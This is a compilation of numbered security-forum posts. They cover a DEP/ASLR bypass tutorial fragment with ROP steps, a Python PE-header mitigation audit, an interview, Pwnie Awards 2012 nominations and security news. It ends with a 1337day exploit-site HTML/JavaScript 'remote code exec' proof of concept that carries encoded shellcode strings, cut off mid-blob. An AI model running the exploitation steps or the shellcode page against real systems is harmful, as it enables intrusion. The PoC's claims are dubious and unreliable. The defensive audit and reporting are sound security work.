WinExec() VirtualProtect() The three API functions above, will enable the attacker to control the execution of shellcode. I will not go into detail about these functions as there is already a lot of material on the subject. Its important to point out that WinExec() will not execute a traditional payload and you will have to be creative with this technique if that's all you can use. Limitations: Less character filtering the better (limited character set means limited ROP chains.) Need lots of space. 
Although this is not ALWAYS the case, generally speaking we will need a decent amount of room for generating the stage 0 shellcode (the ROP chain).
- We need at least one library that is not ASLR protected (that also does not have a randomized base (although this will make it VERY hard, still not impossible)).

Due to these limitations alone, many applications under the new Windows OSes will not be exploitable (assuming DEP is on). Unicode vulnerabilities, ASCII vulnerabilities, and vulnerabilities where no additional libraries can be provided will not work.

Putting it all together, visualize!

First and foremost, you need to be able to 'visualize' how the exploitation will pan out. You need a plan from start to finish and be willing to change your plan completely if need be. First of all, get yourself some ROP chains either by using !pvefindaddr or by manually searching. Once you have that, visualize this process:
- Find an address to kernel32.dll (leak, brute-forcing or a call to the Windows API from the application's non-ASLR modules, etc.)
- Store the address somewhere.
- Calculate the dynamic arguments for your Windows API call (that will be used to bypass DEP).
- Place them carefully either in the data segment or the stack segment.
- Align them correctly and call the function.
- The handler will return us to the location we specified (unless you're using the WriteProcessMemory() technique that patches itself).

Blaze DVD (.plf) file local buffer overflow PoC: Vid download here.

Source: https://net-ninja.net/article/2010/Jun/17/bypassing-aslr-and-dep/
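The limitation above hinges on whether a process carries a module without ASLR (or without DEP opt-in). The following is an added example, not code from the net-ninja article or from this post: a small Python audit that reads the DllCharacteristics flags from a PE image's optional header (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, NX_COMPAT and related bits) and also checks the COFF IMAGE_FILE_RELOCS_STRIPPED flag, since a module that asks for a dynamic base but has no relocation data cannot actually be rebased by the loader. The sample module names and their flag values are constructed for the demonstration; the minimal headers it builds are not loadable binaries.

```python
import struct

# COFF header Characteristics flag: no .reloc data, so the loader cannot rebase the image.
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
# Optional header DllCharacteristics flags.
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400


def pe_mitigations(image: bytes) -> dict:
    """Return the exploit-mitigation opt-ins recorded in a PE image's headers."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    (_machine, _nsections, _timestamp, _symptr, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if opt_size < 72:
        raise ValueError("optional header too short to carry DllCharacteristics")
    magic = struct.unpack_from("<H", image, opt)[0]
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+.
    dllchar = struct.unpack_from("<H", image, opt + 70)[0]
    dynamic_base = bool(dllchar & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    relocs_stripped = bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED)
    return {
        "pe32plus": magic == 0x20B,
        "dynamic_base": dynamic_base,
        "relocs_stripped": relocs_stripped,
        # ASLR only helps if the loader can actually move the image.
        "aslr_effective": dynamic_base and not relocs_stripped,
        "high_entropy_va": bool(dllchar & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "nx_compat": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NO_SEH),
    }


def weak_modules(modules: dict) -> dict:
    """Map module name -> list of weaknesses for every module lacking ASLR or DEP opt-in."""
    findings = {}
    for name, image in modules.items():
        m = pe_mitigations(image)
        problems = []
        if not m["aslr_effective"]:
            problems.append("no effective ASLR")
        if not m["nx_compat"]:
            problems.append("no NX_COMPAT")
        if problems:
            findings[name] = problems
    return findings


def build_sample_pe(dll_characteristics: int, file_characteristics: int = 0) -> bytes:
    """Construct a minimal PE32 header (no sections) for testing; not a loadable binary."""
    opt = bytearray(224)                         # size of a PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)        # Magic = PE32
    struct.pack_into("<H", opt, 70, dll_characteristics)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), file_characteristics)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew: PE signature at 0x40
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed sample process: the module names and flags are invented for this example.
SAMPLE_MODULES = {
    "app.exe": build_sample_pe(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
                               | IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    "legacy.dll": build_sample_pe(0),
    "stripped.dll": build_sample_pe(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
                                    | IMAGE_DLLCHARACTERISTICS_NX_COMPAT,
                                    IMAGE_FILE_RELOCS_STRIPPED),
}

if __name__ == "__main__":
    for name, problems in weak_modules(SAMPLE_MODULES).items():
        print(f"{name}: {', '.join(problems)}")
```

On a real system you would feed `pe_mitigations()` the bytes of each DLL loaded by the application (the same set a debugger plugin lists when hunting for non-ASLR modules); any module it reports is the one to rebuild with /DYNAMICBASE and /NXCOMPAT or to drop from the process.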
  12. Link: [ Shell-Storm.org ] | Papers | Quite a lot of them, and interesting. A few examples:
- Defeating DEP through a mapped file
- X86/Win32 Reverse Engineering Cheat-Sheet
- Intel Assembler CodeTable 80x86
- The Linux Kernel Module Programming Guide
- Exploiting the iOS Kernel
- The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)
- Return Oriented Programming
- Recovering the Toolchain Provenance of Binary Code
- SH-4 CPU Core Architecture
- Non-Executable Stack ARM Exploitation Research Paper
- ARM IAR Assembler - Reference Guide - for Advanced RISC Machines Ltd - ARM Cores
- Bypassing SEHOP
- ASLR - Address Space Layout Randomization
  13. “Choose a job you love, and you will never have to work a day in your life,” said Confucius. These would be the words that describe Marius Corîci the most. In 2003 he started doing business in the plumbing industry and co-founded ITS Group, a franchise for Romstal Company, the biggest plumbing installations retailer in South-Eastern Europe. In 2007 he moved into the Artificial Intelligence field and founded Intelligentics, a group for Natural Language Processing. Now, he is very focused on infosec and got involved in all the biggest independent security projects in Romania: S3ntinel, Hack Me If You Can, Hack a Server and DefCamp. Marius considers himself a serial entrepreneur and is very passionate about Artificial Intelligence. Never a quitter, always a perfectionist, looking for challenges that will change the world we live in. He believes in people and the power of great teams, and he intends to start blogging in the near future.

What determined you to shift your attention towards the software development industry?

Besides the great opportunities, I am a guy who loves challenges. I started to like developing digital products and I believe that the online industry will increase growth in the near future.

Hacking Servers

What is Hack a Server?

HaS (Hack a Server) is a platform designed for conducting manual penetration tests using the power of crowdsourcing, covered by anonymity and confidentiality. It's a fact that communities and individuals who love to discover and test security issues already exist. Whether they are called black, grey or white hackers, crackers, skiddies, PenTesters, you name it, they love to find flaws and vulnerabilities. They love challenges and every flaw or vulnerability represents a challenge for them. This is the truth. When your system or production server gets hacked in real life, peaceful intentions are the least to expect. Trust me, we’ve been there having our platform “tested” and tested.
Thank God we don’t keep any sensitive data about our users on the platform. HaS brings security skilled people to the same place and gets them paid for what they love doing most: Hacking. Everybody can register on our platform, but only the best will have access to the “Playground Arena”, where all the hacking happens. In order to get access to the “Playground Arena”, they will first have to pass a test. We all know that the most important thing when someone finds holes in your system is not the penetration itself but the report that describes the security issues and the solutions. That report is the most important thing for a CTO, Sys Admin or web app developer. The test that a HaS user has to pass in order to get access for hacking is like any other test that they should pass in order to get different security certificates (e.g. CPTC, OSPC, CEH, CEPT, CISSP etc.). The only difference is that we give this opportunity to all our users and we don’t charge for it. This test ensures CTOs, Sys Administrators and web app developers that whenever they pay and receive a Penetration Test Report, it will comply with Penetration Test Standard Reports.

How did you come up with the idea behind the HaS platform?

I used to say: Solve a problem, then build a product. There were two ingredients that made me come up with this idea:
- Gaming: I hate gaming because, if you are not aware, it's like a drug.
- Security: Security is one big problem, believe me.

One day, being with my little daughter at a doctor and waiting to get in, I was thinking „how can you use gaming in such a way as to solve a big problem?” And it struck me. Online Security Gaming, but in another way that it hasn’t been done before. Using the power of crowdsourcing, and not for points (as was done until now), but for real money. After I figured out the outlines, I grabbed the phone, called a friend who’s a Sys Admin and asked if he would use such a platform and how much he would pay for this service.
He said yes, he would use such a service and he would pay like 1000 Euros. …And here we are. If you think deeper, we solve a few other complementary problems, like hackers that were black hats can become grey and start earning real money for what they love most: Hacking Servers. Moreover, we fill up a niche between companies that perform penetration tests at a high cost for small and medium companies, and those companies. In fact we don’t even compete with those companies; we complement them. And I can add at least two or three more good things, like being a sys admin or tester on our platform you get the opportunity, if you are in the „Hall of Fame”, to become a consultant on InfoSec issues.

Building the product

Who is currently working to bring the HaS platform out to the world?

I’ve tried many, we left few. Marius Chis is currently CFO and the first investor in this project. I tried to involve people that fall in love with the project because I’m a strong believer that money is a consequence of a “well done job” and not a purpose. Andrei Nistor is the CTO. He is the one who did most of the coding part, based on relevant feedback from team members or testers. He worked day and night to get the project working flawlessly, and made crowdsourced pentesting possible. Alexandru Constantinescu is the PR & Marketing Executive. He impressed me with his determination when he told me how much he loves the project and wants to jump in on the marketing side with no initial financial interest, because he understands the development stages of a bootstrapped lean startup company. Cosmin Strimbu is our frontend developer. Although I hadn’t met him at the time I’m being interviewed, the same as Alexandru, he just asked me to take him on board. I love this kind of people, driven by passion for what they are doing and not by money. Am I lucky? Yes and no. Lucky because they found me (not otherwise) and they found the project. Not lucky because I worked hard to spread the word about me and my projects.
No, this is not luck, this is hard work. I have spent over 3 years in the online industry, and although I’ve met a lot of people, I would recommend just a few.

What is the business model that will bring you revenue from HaS?

We had a few business models in mind, but since we are dealing with a two sided market place we have decided to charge a decent percentage to those who get paid. That means low rate costs, at a fraction compared with penetration test companies, and we are aiming towards a mass adoption price.

Who are your customers?

HaS customers are companies that want to solve their security issues fast and with low costs. CTOs, CIOs, CISOs, Sys Administrators, Data Base Administrators and Web App Devs are also the professionals within companies that can use our product. Other customers are the individual specialists, whether they are PenTesters or Sys Administrators, who want to verify the security of their innovative servers or applications, covered by what we value most, anonymity and confidentiality.

What are the current features of hackaserver?

Hack a Server is the next level solution to resolve critical security issues in a funny war game way.
- Cost effective: What can be better for your business than The Power of Crowd Source at a fraction of the cost? It’s Fast, Reliable and Secure.
- Fast: Within minutes you can set up your server with the most popular OS and start to configure. I think we have like 7 clicks to have a machine up and running.
- Reliable: Our PenTesters must pass a test and complete a Penetration Test Report to see if they really can be PenTesters before they get access to hack into the Playground Arena.
- Secure: At Hack a Server, we encourage you not to disclose your real identity, whether you are a company representative or a pentester. In this way, we don’t keep sensitive data on our platform, which means that it doesn't matter if someone tries to penetrate our system. They will find nothing.

What’s next? Are there new features to be implemented into the platform?
Ha! There are a lot of features that we want to implement. We have a top three features, but it is better for us to let our customers decide what they want most. On second thought, we have one that we believe will help CTOs, sys administrators, web app devs and companies: finding the best way to automate the process of replicating a physical machine on our platform. Now this is a challenge and we will start as soon as we close this iteration (I think?!).

How do you intend to penetrate the market?

Hack a Server will become the official platform for gaming at DefCamp, a premier InfoSec Conference that will be held on September 6-8 in Cluj-Napoca City at Hotel Napoca. The virtualization module we will make open source, so everybody who wants to deploy a PenTest lab fast can do so free of charge. The virtualization module we intend to implement within faculties so the students will have a funny way to learn security. Those are a few directions, part of our market strategy.

Source: Hack a Server - The man behind the idea | The Hacker News
  14. http://video.google.com/videoplay?docid=4756951231544277406 A presentation about the Heap Feng Shui technique for exploiting heap corruption vulnerabilities in browsers by Alexander Sotirov. Video recorded at BlackHat USA 2007.
  15. Nominations for Pwnie Awards

Pwnie for Best Client-Side Bug

Awarded to the person who discovered or exploited the most technically sophisticated and interesting client-side bug. These days, ‘client’ is pretty much synonymous with ‘web browser’, but don't forget about all the media player integer overflows!

Pinkie Pie's Pwnium Exploit
Credit: Pinkie Pie
The Pwnie Award judges were the original bronies. In a blatant attempt at currying their favor, Pinkie Pie chose a handle near and dear to their hearts. How did he know that Pinkie Pie was our favorite? Just slightly less impressive than this feat of clairvoyance was Pinkie Pie's exploit chain of six bugs that got him full remote code execution in Chrome to win Google's Pwnium competition at CanSecWest.

Sergey Glazunov's Pwnium Exploit
Credit: Sergey Glazunov
Not to be outdone by Pinkie Pie, Sergey's Pwnium exploit took advantage of at least 14 bugs (The Chrome security team apparently lost count after that -- numbers are hard). In another show of one-upmanship, he chose a handle of an extremely obscure My Little Pony.

MS11-087: Unspecified win32k.sys TrueType font parsing engine vulnerability (CVE 2011-3402)
Credit: Duqu Authors
As seen in "Stuxnet 2: Electric Duquloo", this 100% reliable kernel-mode remote code execution exploit could rootkit any version of Windows ever from a font file embedded in a web page or various other file formats. What else could you possibly want from a client-side vulnerability? A cookie?

Flash BitmapData.histogram() Info Leak (CVE 2012-0769)
Credit: Fermin Serna
Fermin demonstrated and documented in exquisite detail how to turn a lossy out-of-bounds memory read vulnerability into full chosen-address memory disclosure. He showed how proper heap manipulation and creativity can build a limited exploitation primitive into a much more powerful one. Oh right, we are supposed to make jokes about these. Too bad nothing actually runs Flash.
iOS Code Signing Bypass (CVE 2011-3442)
Credit: Charlie Miller
Hackers are always looking for interesting ways around "the system", whichever one that may be. In this case, Charlie Miller hatched this get-rich-quick idea:
- Write a stock quote app for iOS and put it on the AppStore
- Discover a code signing bypass that allows third-party apps to dynamically download and execute code and use this in his rogue app
- Entice himself to download the app
- Download and inject code into the app to spy on the list of stocks that he was using the app to get quotes for
- Make lucrative trades based on this valuable information
Unfortunately, before Charlie could profit sufficiently from this information, he talked to the press about his ingenious plot. Apple subsequently pulled his app from the AppStore and from his own iPhone that had installed it (the only user of the app) as well as banned Charlie from the iOS Developer Program for one year. By doing this, Apple kept Charlie safe from himself for the entire next year.

Pwnie for Best Server-Side Bug

Awarded to the person who discovered or exploited the most technically sophisticated and interesting server-side bug. This includes any software that is accessible remotely without using user interaction.

TNS Poison Attack (CVE-2012-1675)
Credit: Joxean Koret
Oracle TNS Listener vulnerabilities bring a tear to our eye. Joxean's attack is basically the forbidden love child between DNS poisoning and those classic TNS Listener vulnerabilities, allowing you to MITM connections to the database from across the Internet.

ProFTPD Response Pool Use-after-Free (CVE-2011-4130)
Credit: Anonymous
Wait, use-after-free bugs exist outside of web browsers? Shame on them for trying to monopolize that bug class. Anyway, this post-auth use-after-free gets you remote code execution on ProFTPD. And that's what dreams are made of. Well, that and puppy tears. Ours are, anyway. "Are we there yet?"
MySQL Authentication Bypass (CVE-2012-2122)
Credit: Sergei Golubchik
On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?" "How about now?" "Now?" For actual details, check out Pwnie Judge extraordinaire HD Moore's blog post.

WordPress Timthumb Plugin 'timthumb' Cache Directory Arbitrary File Upload Vulnerability (CVE-2011-4106)
Credit: Mark Maunder
Here's a tip from some old hands at this game: if the software is named after the author's first name, it is likely INSECURE AS ALL HELL. This design error is a case in point. Download files from attacker-specified URLs into a cache directory inside the webroot? Sounds like a great idea to me.

Pwnie for Best Privilege Escalation Bug

Awarded to the person who discovered or exploited the most technically sophisticated and interesting privilege escalation vulnerability. As more defense-in-depth systems like Mandatory Access Control and Virtualization are deployed, privilege escalation vulnerabilities are becoming more important. These vulnerabilities can include local operating system privilege escalations, operating system sandbox escapes, and virtual machine guest breakout vulnerabilities.

Xen Intel x64 SYSRET Privilege Escalation (CVE-2012-0217)
Credit: Rafal Wojtczuk
It looks like Intel's x64 SYSRET instruction operates differently enough from AMD's x86_64 standard (some people call this "wrong") that an OS written to the AMD standard running on Intel processors includes a bonus privilege escalation feature. Namely, you can get the kernel (or hypervisor) to handle a SYSRET with a user-specified RSP. What could possibly go wrong? Wait, everyone else is vulnerable too? Bonus in your attackers' favor.

iOS HFS Catalog File Integer Underflow (CVE-2012-0642)
Credit: pod2g
This exploit was used for the Absinthe iOS 5.0/5.0.1 untether.
It massaged the kernel heap into submission, copying over the syscall table and giving pod2g (as well as jailbreak users everywhere) a happy ending. And who doesn't love happy endings?

MS11-098: Windows Kernel Exception Handler Vulnerability (CVE-2011-2018)
Credit: Mateusz "j00ru" Jurczyk
j00ru owned Windows. All of them. Ok, well just all of the 32-bit versions of Windows from NT through the Windows 8 Developer Preview. What have you done lately? And to top it off, he wrote a clear paper on it with some of the nicest boxy diagrams we have ever seen in a LaTeX paper.

VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation (CVE-2012-1515)
Credit: Derek Soeder
I'll admit it. The unspecified Pwnie Award judge writing this description never understands any of Derek's bugs and it's getting late and he wants to go to sleep. But Derek's bugs always look big pimpin' and he wishes that he did understand them.

Pwnie for Most Innovative Research

Awarded to the person who published the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post.

Packets in Packets: Orson Welles' In-Band Signaling Attacks for Modern Radios
Travis Goodspeed
Yo dawg, Travis heard you like packets, so he put packets in packets so that he could inject packets into your internal network from all the way across the Internet. Doesn't sound very neighborly to us, but it's still way cool.

Smashing the Atom
Tarjei Mandt
What did the Windows kernel ever do to Tarjei to deserve the merciless beating he has subjected it to over the last several years? Has he not subjected it to enough pain? Apparently not yet.

Injecting Custom Payloads Into Signed Windows Executables
Igor Glucksmann
Incomplete Code Signing attacks are not only useful for iOS jailbreaks, they can also be used to add a few more features to signed PE executables (i.e. software installers, updates, etc) without invalidating the Authenticode signatures.
But why would anyone want to do that?

The Case for Semantics-Based Methods in Reverse Engineering
Rolf Rolles
What you say is more important than how you say it. It turns out that this is true in machine code as well. Rolf's keynote presentation at REcon described how to take approaches from academic program analysis and apply them to real-world reverse engineering challenges.

Comprehensive Experimental Analyses of Automotive Attack Surface
Stephen Checkoway, et al.
Many hackers have been complaining about the extinction of unmitigated vanilla stack buffer overflows. It turns out that they are not extinct at all, they have all just migrated to YOUR CAR. Stephen Checkoway and the rest of his team identified and exploited these vulnerabilities through a burned CD, paired BlueTooth device, unpaired BlueTooth device, and through a phone call to the car's internal GSM cell phone. Yes, they can call up your car and install malware on it, which they actually implemented (how non-Academic of them). The future is a very scary place. Luckily, the majority of the Pwnie Award judges don't drive. Or use computers. Or phones.

Pwnie for Lamest Vendor Response

Coming soon!

Pwnie for Best Song

What kind of awards ceremony does not have an award for best song? There is strangely enough a long tradition of hacker-written songs and raps (parodies and originals). And in Pwnies past, we somehow coerced HD and Halvar to rap some of these. And rather than let it become anyone else's turn, we have a new rule. Nominations for 'Best Song' must actually have audio. For your listening pleasure, the nominees are:

What You Need METASPLOIT!
Marco Figueroa
Giving shoutouts to almost all of the Pwnie Award judges definitely helps win a Pwnie nomination (for the record, offerings of 0day work better). Only time will tell if this song is a "certified Pwnie Award winner".

NYAN
Who would have thought that C++ method names from MSHTML.DLL could make such a catchy chorus? We never would have.
The UW CSE Band
The UW CSE Band has the unique distinction of being the first Best Song nominee that is sung (not rapped) by someone who can actually sing on key. This song, a cover of The Cranberries' "Zombie", gives us flashbacks to the mid-90's when server-side remotes and raver pants were plentiful.

Give It Some Salt
beep@bugslap.com
The LinkedIn breach, explained in rap form.

Control
Dual Core
Written for the Social Engineering Podcast, this song satisfies your corporate social engineering training requirement and you get CISSP points just by listening to it. Just tell your boss that we said so.

Pwnie for Most Epic FAIL

Sometimes giving 110% just makes your FAIL that much more epic. And what use would the Internet be if it wasn't there to document this FAIL for all time? This award is to honor a person or company's spectacularly epic FAIL. And the nominees are:

The Anti-Virus Industry
Anti-Virus Industry
Do you really need us to elaborate?

Herpesnet
Francesco Pompo (aka Frk7)
Even botmasters have trouble adhering to sound information security practices like choosing strong passwords, auditing their PHP code for vulnerabilities, and limiting the amount of their personal information that is available online. The malware.lu crew took advantage of fails in all of these to track down and dox the botmaster behind the Herpes botnet. If you find that one of your machines is infected with Herpes, ask your doctor what malware.lu can do for you.

LinkedIn Breach of 6 Million Password Hashes
LinkedIn
What has 2500 employees, over 90 million users, no CSO, and hates salt? This company.

F5 Static Root SSH Key
F5 Networks
Including a SSH authentication public key for root on all F5 devices is nice, putting the private key for it in the firmware where it can be found and then used against any other F5 device is even better. For FAIL, press F5.
Pwnie for Epic 0wnage

0wnage, measured in owws, can be delivered in mass quantities to a single organization or distributed across the wider Internet population. The Epic 0wnage award goes to the hackers responsible for delivering the most damaging, widely publicized, or hilarious 0wnage. This award can also be awarded to the researcher responsible for disclosing the vulnerability or exploit that resulted in delivering the most owws across the Internet.

"Flame" Windows Update MD5 Collision Attack
Flame Authors
Any attack that requires a breakthrough in cryptography to pull off is pretty cool in our book. And being able to pwn any Windows machine through Windows Update is pretty mass 0wnage.

Certificate Authorities
Everyone
It turns out that Certificate Authorities themselves are one massive security vulnerability. How many more CAs need to get popped before we as an industry realize that allowing Bob's Bait, Tackle, and Certificates to issue wildcard certificates is a bad idea?

iOS Jailbreaks
iPhone Dev Team and Chronic Dev Team
We love the jailbreakers and you should too. They publicly drop all of their exploits as 0day, convince millions of users to disable the security features on their own devices, and then keep those devices vulnerable to the released exploits until new exploits can be developed and released in the patched versions of iOS.

Source: Pwnie Awards 2012
  16. After the Flame virus scandal, yet another "political" virus has been discovered by IT security firms in the Middle East. The Madi or Mahdi virus, used for obtaining secret information, has been detected in Iran, Israel and Afghanistan. More than 800 PCs belonging to government agencies, financial institutions and infrastructure companies have been infected by the Madi virus, according to experts at Kaspersky Lab and Seculert, as stated in a press release sent to HIT.ro. While Flame's goal was to stop Iran's nuclear program, the Madi or Mahdi virus, whose name is the equivalent of "Messiah" in Islam, aims to obtain secret information, from emails and passwords to file transfers. The Madi trojan allows cybercriminals to steal confidential information from computers running Microsoft Windows operating systems, to monitor communication through email and instant messaging programs, to record audio and keystrokes, and to take screenshots. Analysis confirms that several gigabytes of information reached the criminals' servers. Among the applications and web pages spied on are the victims' Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+ and Facebook accounts. Surveillance was also conducted through integrated ERP/CRM systems, business contracts and financial management systems. The new malware threat was detected much more easily and has far less complex code than the Flame virus, considered the most sophisticated in the history of information technology.

Source: Flame are un frate: inca un virus "politic" descoperit de firmele de securitate IT | Hit.ro
  17. (Reuters) - Computer geeks attending the world's largest annual hacking party in Las Vegas next week will have a rare chance to rub shoulders with the head of the U.S. National Security Agency.

General Keith Alexander, director of the spy agency, will speak at the Defcon conference, marking the highest-level visit to date by a U.S. government official to the colorful gathering. Organizers expect some 15,000 hackers this year as they celebrate the 20th anniversary of the first U.S. hacking event that was open to the public. The Pentagon disclosed the visit on Friday.

"We're going to show him the conference. He wants to wander around," said Jeff Moss, a hacker who organized the first Defcon conference while working as a messenger for a Seattle law firm. He now sits on an advisory committee to the Department of Homeland Security.

Alexander may choose to talk shop with the techies. He holds four master's degrees, including ones in electronic warfare and physics. Still, Moss said he expects there could be some controversy over Alexander's presence among the diverse hacker crowd that attends the conference. The NSA plays both offense and defense in the cyber wars. It conducts electronic eavesdropping on adversaries, in addition to protecting U.S. computer networks.

"I expect some people will say 'You are a sellout for having someone from the NSA speak,'" said Moss, who is known as the Dark Tangent in the hacking community. But he doesn't see it that way. "One of the things I try to do at Defcon is take some of the hackers out of their comfort zone. I want to expose them to people they would normally not hear from," he said. "Don't you think it's important to hear what the most senior person at the NSA has to say? I'm interested in hearing what he has to say," said Moss, whose full-time job is serving as chief security officer with ICANN, the Internet Corporation for Assigned Names and Numbers, which helps manage the infrastructure for much of the Internet.
Hackers come to the conference to exchange information about tools of the trade, socialize and compete in hacking contests. There will be talks on attacking mobile phones and Google TV, more technical discussions on programming and discussions about government surveillance. Defcon offers a side conference for children, Defcon Kids, which Alexander will likely visit. It also trains hackers to pick locks and has an annual contest to measure who is best at persuading corporate workers to release sensitive data over the phone.

Moss said he invited federal agents to the first Defcon conference, but that they politely declined. They showed up anyway, incognito. They kept coming, in bigger numbers, sometimes in uniform. "We created an environment where the feds felt they could come and it wasn't hostile," Moss said. "We could ask them questions and they wanted to ask the hackers about new techniques." He said he's spent a decade trying to get the head of the NSA to speak at Defcon, but he never imagined it would actually happen: "To me this is really validating of the whole culture."

Source: U.S. spy agency chief to meet with hackers at Defcon | Reuters
  18. Read here.
  19. <!-- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm S4(uR4 member from r00tw0rm team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ''' # # Name : Intel Core2Duo cpu cache controller bug PoC # Date : july, 14 2012 # Author : S4(uR4 # Platform : all # Type : remote exploit # Web : www.r00tw0rm.com # Email : satsura@r00tw0rm.com # Credit and special thanx : Selena, nezumi # Tested on : Intel Core 2 Duo T5750, Intel Atom N270 # Special thanks to : r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com) # Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com) --> <html> <head> <title> CPU cache controller bug exploit (Remote code exec mod poc)</title> </head> </html> <body> <script type="text/javascript"> var microcode = 257; var N_CORE = 4; var XXL = 9*1024*1024; var buf = 9437185; var p = {}; var bug; var result; var n = {}; function init_c(){}; function engine(p, n){}; function test(result){ // debug: testing micro-program for the old vm, does not work now // latter comment 1: oh. my! it works! wow! 
// latter comment 2: it works, but it does not what it's expected to // dw buf[]={1,-3,0, -6,9,1, 13,-67,2, -69,96,3, 1,-1,4, // -3,3,5, 16,-27,6, -66,99,7, 55,-1,8, -1,-3,9, 0,-67,10}; // the infinite loop will be patched on the fly because of the Intel CPU bug // addr of the test() func should be aligned by 4Kb boundary, // 1st dword will be changed to NOP, NOP, NOP, NOP // it's possible to change the kernel memory as well, // two things: // 1) alignment; // 2) the code is currently executed; // // engine() obtains the address of test(), but does not check it, // so if you replace it, you have to check the conditionals above by yourself. // also the content to overwrite. if you want to change data memory // it's supposed to be in the cache as well. /* ASM: .text .globl main .type main, @function L1: xorl %ecx, %ecx main: pushl %ebp movl %esp, %ebp popl %ebp loop L1 ret .size main, .-main DISASM: 080483b4 <L1>: 80483b4: 31 c9 xor %ecx,%ecx 080483b6 <main>: 80483b6: 55 push %ebp 80483b7: 89 e5 mov %esp,%ebp 80483b9: 5d pop %ebp 80483ba: e2 f8 loop 80483b4 <L1> 80483bc: c3 ret 80483bd: 90 nop 80483be: 90 nop 80483bf: 90 nop */ unescape('%u31C9%u5589%uE55D%u2EF8%uC390%u9090'); return 0; } function ThreadProc(lpParameter){ engine(buf, microcode*3); return(0); } function ThreadProc_dbg(bug){ var result = 1; test(result); if (result != 1){ document.write("<h1>[+] your CPU is buggy!<h1>"); } else{ document.write("<h1>[-] your CPU isn't buggy!<h1>"); //eueeuereturn(0); } } function microcode_vm(){ var evilcode = "6B70%u6E63%u2066%u6F72%u204A%u442E%u2066%u6F72%u2049%u6E74"+ "%u656C%u2043%u6F72%u6520%u3220%u4475%u6F20%u5435%u3735%u300D%u0A28%u6329"+ "%u2053%u656C%u656E%u612F%u2F32%u3030%u372C%u2032%u3030%u3800%u2B00%u0000"+ "%u0500%u0000%u2600%u0000%u3E00%u0000%u4702%u0000%uE7FD%uFFFF%u0000%u0000"+ "%uA3FF%uFFFF%uA7FF%uFFFF%u0100%u0000%u0200%u0000%u0A00%u0000%u0200%u0000"+ "%u0100%u0000%u0900%u0000%u0300%u0000%u0400%u0000%u1400%u0000%u0400%u0000"+ 
